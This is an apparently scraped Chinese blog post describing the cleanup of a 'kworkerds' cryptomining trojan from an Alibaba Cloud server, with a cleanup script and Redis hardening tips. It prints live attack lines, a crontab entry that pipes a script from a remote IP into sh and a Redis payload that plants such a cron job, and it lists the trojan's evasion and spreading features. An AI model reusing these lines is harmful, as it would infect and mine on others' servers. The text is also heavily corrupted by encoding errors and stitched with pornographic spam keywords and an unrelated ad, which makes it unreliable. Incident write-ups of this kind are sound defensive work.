日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
記一次阿里云被植入挖礦木馬事件

一、起因

創(chuàng)新互聯(lián)建站是一家專注于成都做網(wǎng)站、網(wǎng)站設(shè)計與策劃設(shè)計,鹽邊網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)建站做網(wǎng)站,專注于網(wǎng)站建設(shè)十多年,網(wǎng)設(shè)計領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:鹽邊等地區(qū)。鹽邊做網(wǎng)站價格咨詢:18980820575

今天,同事說我負責的模塊在阿里云上不工作了,我趕忙遠程登錄查看。

1. 服務(wù)器的癥狀

  • 敲命令的時候,終端的字符回傳很快,但是命令的響應時間較長;
  • 服務(wù)器內(nèi)存32GB,剩余200MB;
  • CPU跑到了99%;
  • 我負責的模塊之前一直工作正常,穩(wěn)定性好,沒修改過配置,但現(xiàn)在不能工作;
  • 查看我負責的模塊配置正常、運行正常,但部分服務(wù)出錯;
  • top命令未發(fā)現(xiàn)有高耗CPU的進程,但是有大量的kworkerds進程。

2. 定位分析

病癥1、3、6說明是阿里云服務(wù)器已經(jīng)產(chǎn)生了異常。

根據(jù)病癥4、5一步步梳理流程,核對日志,定位問題,最終發(fā)現(xiàn),redis可以正常提供服務(wù),但程序無法將數(shù)據(jù)刷新到redis,導致分別負責讀寫的兩個模塊數(shù)據(jù)長時間不能同步,重啟redis后服務(wù)正常。但問題需要進一步分析。

二、查找木馬

服務(wù)器是與別人共用的,其他的服務(wù),我們不知道是否有用。但服務(wù)器卡頓,實在影響調(diào)試效率,搜索了一下kworkerds,才知道是個挖礦的木馬程序。

查看木馬進程數(shù)

 
 
 
 
    
  
  
  
  
  1. [root@xxx ~]# ps -ef | grep -v grep |grep kworkerds | wc -l
    2. 
  
  
  
  
  2. 385
    3.

kill掉所有木馬進程

 
 
 
 
    
  
  
  
  
  1. [root@xxx ~] # ps auxf | grep -v grep | grep kworkerds | awk '{print $2}' | xargs kill -9
    2.

查看開機啟動項和任務(wù)

 
 
 
 
    
  
  
  
  
  1.  [root@XXX ~]# systemctl list-unit-files
    2. 
  
  
  
  
  2.  (沒發(fā)現(xiàn)問題,就不貼進來了)
    3. 
  
  
  
  
  3.  [root@XXX ~]# cat /etc/rc.local
    4. 
  
  
  
  
  4.  (沒發(fā)現(xiàn)問題,就不貼進來了)
    5. 
  
  
  
  
  5.  [root@XXX ~]# cat /etc/crontab
    6. 
  
  
  
  
  6.  ...
    7. 
  
  
  
  
  7.  01 * * * * root run-parts /etc/cron.hourly
    8. 
  
  
  
  
  8.  02 4 * * * root run-parts /etc/cron.daily
    9. 
  
  
  
  
  9.  0 1 * * * root /usr/local/bin/dns
    10. 
  
  
  
  
  10.  [root@XXX ~]# crontab -l
    11. 
  
  
  
  
  11.  */23 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh
    12.

“/etc/crontab”里的內(nèi)容看起來好像是正常,但是“crontab -l”中顯示的內(nèi)容有些來路不明。

于是下載代碼查看

 
 
 
 
    
  
  
  
  
  1. [root@xxx ~]# (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)
    2. 
  
  
  
  
  2. (木馬的代碼我就不貼進來了)
    3.

限于篇幅,木馬的代碼就不展示在此了,大家可以自行下載查看,記住,下載的時候要把"|sh"去掉,當心玩火自焚。

三、分析木馬

木馬腳本寫得還是不錯的,風格整齊,邏輯嚴謹。出色地完成了以下功能:

  • 刪除阿里云云盾客戶端和阿里云監(jiān)控程序;
  • 停止、刪除主機已經(jīng)存在的其他挖礦程序;
  • 下載挖礦程序和配置文件并執(zhí)行;
  • 約束木馬程序,防止觸發(fā)服務(wù)器性能監(jiān)測工具告警;
  • 設(shè)置任務(wù)計劃,保持更新,持續(xù)感染主機;
  • 通過本機感染其他主機;
  • 清空操作日志,篡改文件修改時間,隱藏自己的訪問蹤跡。

木馬中同時用了shell和python兩種腳本,腳本逐層嵌套,對于一些敏感的代碼,使用了base64進行加密,針對不同的系統(tǒng)平臺有不同的處理,同時鎖定了自己修改的文件,防止被別的程序隨意修改,提供遠程服務(wù)的IP地址來自非洲東部的塞舌爾共和國。

四、木馬是如何傳播的

1. 傳播方式

木馬傳播方式有三種,如下:

  • activeMQ
  • redis
  • ssh的免密碼登錄

2. 傳播思路

木馬感染的步驟如下:

  • 通過掃描"xxx.xxx.0.0/16"網(wǎng)段內(nèi)的所有IP的6379和8186兩個端口;
  • 如果可以連接,那么以key-value的形式寫入數(shù)據(jù);
    •   
  
  
  
      
   
   
   
   
    1. 'set SwE3SC "\\t\\n*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n'
      2.
  • 將該條數(shù)據(jù)以文件的形式保存到定時任務(wù)的文件目錄,如/var/spool/cron/root等;
  • 下個定時周期到來時,服務(wù)器自動下載遠程腳本并執(zhí)行;
  • 遍歷該主機可以免密碼登錄的其他主機,遠程連接并執(zhí)行代碼。

遠程腳本執(zhí)行時,會重新修改定時任務(wù)等文件,保證可以持續(xù)感染主機,同時也隱藏了第一次感染的痕跡。之后每個定時周期到來時,都會重復4、5兩個步驟。

3. 排查漏洞

服務(wù)器中沒有activeMQ,沒有.ssh文件夾。小編也根據(jù)代碼流程,感染了一下自己的redis,但是并沒有達到預期的結(jié)果。

本人用的redis文件保存的時候是二進制的,不是字符串,根本無法被定時任務(wù)執(zhí)行,但是修改感染腳本,可以完成黑客設(shè)置的既定思路。

結(jié)合阿里云之前修改過密碼的情況,本次感染可能有兩種來源:

  • 以前發(fā)現(xiàn)了被感染,但木馬沒有被清理干凈;
  • 木馬作者會定期修改自己的代碼來感染不同版本的redis,甚至是去利用其它軟件的漏洞。

另外一個代碼變動的證據(jù)就是netstat命令的二進制文件遭到篡改,這顯然是為了應對運維人員排查異常網(wǎng)絡(luò)連接而設(shè)計的,但本次檢查木馬代碼時,并沒有發(fā)現(xiàn)與netstat命令有關(guān)的操作。

五、清理木馬

清理過程分兩步:刪除木馬文件和修補當前漏洞。

1. 刪除木馬文件

根據(jù)木馬的代碼,寫了清理腳本,如下:

 
 
 
 
    
  
  
  
  
  1. #!/bin/bash
    2. 
  
  
  
  
  2. ps auxf | grep -v grep | grep kworkerds | awk '{print $2}' | xargs kill -9
    3. 
  
  
  
  
  3. 
  
  
  
  
  4. chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload
    5. 
  
  
  
  
  5. echo "" > /usr/local/bin/dns
    6. 
  
  
  
  
  6. echo "" > /etc/cron.d/root
    7. 
  
  
  
  
  7. echo "" > /etc/cron.d/apache
    8. 
  
  
  
  
  8. echo "" > /var/spool/cron/root
    9. 
  
  
  
  
  9. echo "" > /var/spool/cron/crontabs/root
    10. 
  
  
  
  
  10. rm -rf /etc/cron.hourly/oanacroner
    11. 
  
  
  
  
  11. rm -rf /etc/cron.daily/oanacroner
    12. 
  
  
  
  
  12. rm -rf  /etc/cron.monthly/oanacroner
    13. 
  
  
  
  
  13. 
  
  
  
  
  14. sed -i '/cron.hourly/d' /etc/crontab
    15. 
  
  
  
  
  15. sed -i '/cron.daily/d' /etc/crontab
    16. 
  
  
  
  
  16. sed -i '/usr\/local\/bin\/dns/d' /etc/crontab
    17. 
  
  
  
  
  17. 
  
  
  
  
  18. #sed -i '$d' /etc/ld.so.preload
    19. 
  
  
  
  
  19. rm -rf /usr/local/lib/libntpd.so
    20. 
  
  
  
  
  20. 
  
  
  
  
  21. #/tmp/.a可以不刪,木馬是通過此文件判斷是否要卸載阿里云盾
    22. 
  
  
  
  
  22. #rm -rf /tmp/.a
    23. 
  
  
  
  
  23. rm -rf /bin/kworkerds
    24. 
  
  
  
  
  24. rm -rf /tmp/kworkerds
    25. 
  
  
  
  
  25. rm -rf /usr/sbin/kworkerds
    26. 
  
  
  
  
  26. rm -rf /etc/init.d/kworker
    27. 
  
  
  
  
  27. chkconfig --del kworker
    28.

腳本僅供大家參考,在執(zhí)行之前還是要對照一下具體的環(huán)境。

除此之外,還需要排查一下系統(tǒng)中是否有異常用戶,異常的服務(wù)和異常的監(jiān)聽端口。畢竟服務(wù)器被入侵過,絕不能等閑視之。

2. 修補漏洞

以redis為例,修補漏洞有很多種方法:

  • 限制端口,使其對外不可連接;
  • 不要使用root運行reids;
  • 及時更新軟件,修補漏洞;
  • 修改默認端口;
  • 對重要命令重命名;

關(guān)于這個問題,阿里云也有詳細的安全加固方案:

https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186631.2.3.29131848FutMrC

編者的話

黑客一詞聽起來感覺酷酷的,因為世界上確有一批崇尚用技術(shù)實現(xiàn)“開放、自由、真實、平等、美好生活”的人,他們離經(jīng)叛道,閃閃發(fā)光。然而,通常情況下非法獲取利益的黑客僅僅是一個小偷而已,喜歡的是不勞而獲,而不是技術(shù)本身,技術(shù)水平也只能是一般。

希望大家從技術(shù)交流,防范風險的角度看待文中提供的木馬資料,不要走上違法犯罪的道路。從另一個角度講,信息安全無小事,文中的木馬僅僅是挖礦,事實上,該漏洞足以讓黑客在你的服務(wù)器上做任何事,大家萬萬不可掉以輕心。


本文題目:記一次阿里云被植入挖礦木馬事件
當前網(wǎng)址:http://m.5511xx.com/article/dpipgoh.html